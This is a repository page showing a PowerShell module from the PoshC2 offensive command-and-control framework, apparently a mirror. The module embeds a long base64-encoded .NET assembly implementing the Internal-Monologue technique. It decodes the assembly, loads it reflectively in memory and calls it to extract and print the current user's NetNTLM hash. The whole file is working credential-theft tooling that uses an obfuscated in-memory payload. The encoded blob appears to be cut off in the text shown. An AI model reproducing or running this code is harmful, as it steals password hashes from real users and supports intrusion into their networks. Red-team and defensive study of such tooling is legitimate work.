infosecn1nja
/
PoshC2_Python
mirror of https://github.com/infosecn1nja/PoshC2_Python.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity
PoshC2_Python/Modules/Get-Hash.ps1

17 lines
22 KiB
PowerShell
Raw Normal View History

Obtain a user hash using the methods from 'Internal-Monologue'
2018-11-15 14:08:17 +00:00
$InternalMonologue = $null
# https://github.com/eladshamir/Internal-Monologue
Function Get-Hash {
if ($InternalMonologue -ne "TRUE") {
$script:InternalMonologue = "TRUE"
echo "Loading Assembly"
Added CSharp Implant/Dll/Shellcode - More functionality coming soon
2018-12-27 12:10:46 +00:00
$PS = "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
Obtain a user hash using the methods from 'Internal-Monologue'
2018-11-15 14:08:17 +00:00
$dllbytes = [System.Convert]::FromBase64String($PS)
$assembly = [System.Reflection.Assembly]::Load($dllbytes)
}
$output = [InternalMonologue.Class1]::Main()
Write-Output ("[+] NetNTLM Hash")
Write-Output $output
}